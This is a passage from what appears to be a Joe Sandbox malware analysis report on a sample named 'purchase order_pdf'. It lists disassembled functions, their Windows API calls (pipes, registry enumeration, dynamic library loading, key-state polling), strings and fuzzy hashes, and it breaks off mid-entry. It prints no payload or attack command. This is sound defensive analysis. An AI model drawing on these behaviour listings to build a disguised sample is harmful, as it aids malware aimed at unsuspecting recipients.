Part of subcall function 00871D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00871D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008F66D0
LoadLibraryW.KERNEL32(?), ref: 008F66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008F66EC
DestroyWindow.USER32(?), ref: 008F66F4

Strings

SysAnimate32, xrefs: 008F66AB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: e2274561e4dbab97aa50636368672c6431b89139c909ff5b52c19c7135e131ce
Instruction ID: 19f311e333bcd7df1a621db6614478ccbd70a514d7f757f7b98be37f8087c473
Opcode Fuzzy Hash: e2274561e4dbab97aa50636368672c6431b89139c909ff5b52c19c7135e131ce
Instruction Fuzzy Hash: 6E21497120020ABBEF105E78EC80EBB77A9FF69368F104729FA11D6190E775DC619761

Function 008D703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 008D705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008D7091
GetStdHandle.KERNEL32(0000000C), ref: 008D70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008D70DD

Strings

nul, xrefs: 008D70D8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 70ef610b85e8676534942166e6be876cbaa36615101916224c37775fed153130
Instruction ID: a7f011ded4c23f49c4f3dd249a6876602d2adb429fc8906da02d4a7685065aed
Opcode Fuzzy Hash: 70ef610b85e8676534942166e6be876cbaa36615101916224c37775fed153130
Instruction Fuzzy Hash: 3C213B75504609ABDB209F39D805AAA77A8FF54724F208B1AF9A1D73D0F7709C50CB51

Function 008D710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008D712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008D715D
GetStdHandle.KERNEL32(000000F6), ref: 008D716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008D71A8

Strings

nul, xrefs: 008D71A3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: da8ba728f78b6226cbf6a86c03778ebe3765f77b9e37c207808e5807c5b59404
Instruction ID: c10e7efefd5c0bb8b2bd65400bd7e0234f450502415fa1c3bd76a1a609cc61f9
Opcode Fuzzy Hash: da8ba728f78b6226cbf6a86c03778ebe3765f77b9e37c207808e5807c5b59404
Instruction Fuzzy Hash: 4821607550421AABDF209F689C04EAEB7A8FF55724F200B1AF9A1D73D0F7709851CB51

Function 008DAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008DAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008DAF13
__swprintf.LIBCMT ref: 008DAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,008FF910), ref: 008DAF6A

Strings

%lu, xrefs: 008DAF26

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 68c8d789ac63254c4b5e083e5da804fde833213043d22ef4add86d437ea8dc0b
Instruction ID: adcc3513626c3f2ca42e560262325e8b836fb0fc7c02b496e9bc28b6e94f2c24
Opcode Fuzzy Hash: 68c8d789ac63254c4b5e083e5da804fde833213043d22ef4add86d437ea8dc0b
Instruction Fuzzy Hash: E6217430A00109AFCB10DF68CC85DAE7BB8FF89714B104069F509EB352DB71EA41CB22

Function 008CA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Part of subcall function 008CA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008CA399
Part of subcall function 008CA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008CA3AC
Part of subcall function 008CA37C: GetCurrentThreadId.KERNEL32 ref: 008CA3B3
Part of subcall function 008CA37C: AttachThreadInput.USER32(00000000), ref: 008CA3BA

GetFocus.USER32 ref: 008CA554

Part of subcall function 008CA3C5: GetParent.USER32(?), ref: 008CA3D3

GetClassNameW.USER32(?,?,00000100), ref: 008CA59D
EnumChildWindows.USER32(?,008CA615), ref: 008CA5C5
__swprintf.LIBCMT ref: 008CA5DF

Strings

%s%d, xrefs: 008CA5D9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 77256d6d455784f09d7e42ff5389f900776280e1b5148b6ceefd3012e2016a06
Instruction ID: 6c5ad40f20c01fadb3809cd8b09226025b8f2712b870938168abbbe4b4f9f103
Opcode Fuzzy Hash: 77256d6d455784f09d7e42ff5389f900776280e1b5148b6ceefd3012e2016a06
Instruction Fuzzy Hash: 7E119071200208ABDF147F78EC85FAA7B78FF48708F044079BA18EA256CA74D945CB76

Function 008D2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008D2048

Strings

REMOVE, xrefs: 008D204E
EXISTS, xrefs: 008D2070
APPEND, xrefs: 008D2081
KEYS, xrefs: 008D205F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 95dde1691ac2876495c7e68abba515612318329b781e20d008286e1265e7f4de
Instruction ID: de06b3635e03e9f10121ccf6a7139a8a13ed6de4efc35d0e130a1029dab8a3c6
Opcode Fuzzy Hash: 95dde1691ac2876495c7e68abba515612318329b781e20d008286e1265e7f4de
Instruction Fuzzy Hash: A1115E319001198FCF10EFA8D9814EEB7B4FF25304B148669D855E7356DB325D16CB51

Function 008EEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008EEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 008EEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008EF07E
CloseHandle.KERNEL32(?), ref: 008EF0FF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 170c51db93b4efce2a0e2d6637604a6ab792e36936c5fa6ebd4bbfe2f8a6c057
Instruction ID: 1dfa6766a7837aa8315fd1c67d9acf978de06672bd5b93a857edf3175929c9e9
Opcode Fuzzy Hash: 170c51db93b4efce2a0e2d6637604a6ab792e36936c5fa6ebd4bbfe2f8a6c057
Instruction Fuzzy Hash: D4813D716047119FD720DF29C886F2AB7E5FF89720F14882DF699DB292DB70E9408B52

Function 008F02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008F0038,?,?), ref: 008F10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008F0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008F03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008F040E
RegCloseKey.ADVAPI32(?,?), ref: 008F043A
RegCloseKey.ADVAPI32(00000000), ref: 008F0447

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 6527a4aecfb0b3623768bfbb91a8107d21a046810e4ad6d09b7cd66c5ab65238
Instruction ID: 38c4e41f050dc8e45a0a67e51d00f1b4439f55d8794d9b8415728d2fc27b100c
Opcode Fuzzy Hash: 6527a4aecfb0b3623768bfbb91a8107d21a046810e4ad6d09b7cd66c5ab65238
Instruction Fuzzy Hash: D2512D31208204AFD704EF68C881E7AB7E8FF84314F44892DF695D7292DB30E904CB52

Function 008EDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008EDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 008EDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 008EDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 008EDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008EDD35

Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008D7B20,?,?,00000000), ref: 00875B8C
Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008D7B20,?,?,00000000,?,?), ref: 00875BB0

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 0bc54a79e2939a788bafe3c6d1c1c4e4962d3e7043a0914be59c322c17f2cce4
Instruction ID: 40135344761570e9b3e19f6232f5b5f2af97d11557757a239eff97a8b3a81044
Opcode Fuzzy Hash: 0bc54a79e2939a788bafe3c6d1c1c4e4962d3e7043a0914be59c322c17f2cce4
Instruction Fuzzy Hash: CD511435A00209DFDB01EF68C8849ADB7B4FF59320B14C069E919EB352DB70ED45CB91

Function 008DE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008DE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008DE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008DE8F2

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008DE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008DE91F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 0c4cd55e34395f4bfaaca93de36836a7a8449d7609f74896f84f1540b91105e1
Instruction ID: 496368a0db36dcc7fa62d62b79a66b30de6874876c1416bfaa648b2116838345
Opcode Fuzzy Hash: 0c4cd55e34395f4bfaaca93de36836a7a8449d7609f74896f84f1540b91105e1
Instruction Fuzzy Hash: EA510735A00605EFCB01EF68C981AADBBF5FF48310B1480A9E949AB362CB31ED11DB51

Function 008FA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a123191a9fbaa6f85e109aef9d9e75588af68057b446d2b0a202d0c888bb8a1b
Instruction ID: 31d123b415d7bc2c5e4005ffe280f29c8f847ec4e311468b26a28935a1699365
Opcode Fuzzy Hash: a123191a9fbaa6f85e109aef9d9e75588af68057b446d2b0a202d0c888bb8a1b
Instruction Fuzzy Hash: D44190B590420CABD728DB38CC44FB9BBA4FB09320F154165EA59E72E1D770AD41DA61

Function 00872344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00872357
ScreenToClient.USER32(009367B0,?), ref: 00872374
GetAsyncKeyState.USER32(00000001), ref: 00872399
GetAsyncKeyState.USER32(00000002), ref: 008723A7

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 699e8f742910e2dc71d9756f2e91f2398c0942a7f20f825e84d31e8aa7bd8c0a
Instruction ID: bdceb2c2762129114e88526e7594954eb88fd77cb280731fe5fea5e2c1536e8a
Opcode Fuzzy Hash: 699e8f742910e2dc71d9756f2e91f2398c0942a7f20f825e84d31e8aa7bd8c0a
Instruction Fuzzy Hash: 3C418F75A04119FBDF159F68C844AEEBB74FF06324F20831AF928D63A0C734A994DB91

Function 008C6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C695D
TranslateAcceleratorW.USER32(?,?,?), ref: 008C69A9
TranslateMessage.USER32(?), ref: 008C69D2
DispatchMessageW.USER32(?), ref: 008C69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C69EB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: dd38e5bf6d99fdaf4e6c1e24ca720f56898d7a7867738007f769e87a7f8bdb7b
Instruction ID: dc9fa0103c5478c6c22a87632eca7cf02180deaab586d3eda741a853f8077dc5
Opcode Fuzzy Hash: dd38e5bf6d99fdaf4e6c1e24ca720f56898d7a7867738007f769e87a7f8bdb7b
Instruction Fuzzy Hash: 1E319E71918256AADB208F749C44FB67BB8FF15304F14817DE422D21A1F634D8A9EBA1

Function 008C8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008C8F12
PostMessageW.USER32(?,00000201,00000001), ref: 008C8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008C8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 008C8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008C8FDA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b0270442c3119304928bc7ddc49c1aa59d8abf74544cd1c77550048dbcebb37b
Instruction ID: 6f856f07ad0d8d0c6b582f2ebf13961ec100ca628c14f3fe9d4828ec27a74fa2
Opcode Fuzzy Hash: b0270442c3119304928bc7ddc49c1aa59d8abf74544cd1c77550048dbcebb37b
Instruction Fuzzy Hash: 9031BA71500219EBDB10CF68D948BAE7BB6FB04315F10422DFA24EA2D1CBB0D910CB90

Function 008CB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 008CB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008CB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008CB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008CB742
_wcsstr.LIBCMT ref: 008CB74C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 232ccf48d85f2ce1fdc534cdcd1669e903bb1bd1a79b1051a4a1ce01094b1e38
Instruction ID: bf6bb628cde0a159043132b5c4f294f9af9dead002ebd47ab68baffaa23f05ce
Opcode Fuzzy Hash: 232ccf48d85f2ce1fdc534cdcd1669e903bb1bd1a79b1051a4a1ce01094b1e38
Instruction Fuzzy Hash: A221C132204604BBEB259B799C4AF7B7BA8FF85760F14402DFD05CA1A1EF71C840D661

Function 008FB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

GetWindowLongW.USER32(?,000000F0), ref: 008FB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 008FB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008FB489
GetSystemMetrics.USER32(00000004), ref: 008FB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008E1184,00000000), ref: 008FB4D0

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8556b448020715a1d194a9963edfdc30ec3133fb14322b013792673f46be1801
Instruction ID: 1a57c91575806b471d06aa36092108760b4a9d2768acbaf07107d612e6440b12
Opcode Fuzzy Hash: 8556b448020715a1d194a9963edfdc30ec3133fb14322b013792673f46be1801
Instruction Fuzzy Hash: 55218371914259AFCB109F38CD44A7A37A4FF19724F148738FA26D71E2E7309810DB94

Function 008C97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008C9802

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008C9834
__itow.LIBCMT ref: 008C984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008C9874
__itow.LIBCMT ref: 008C9885

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: bab65fc521bffcab670ac79e100460bb33d6df2eb63303c6affac044e43a6ea8
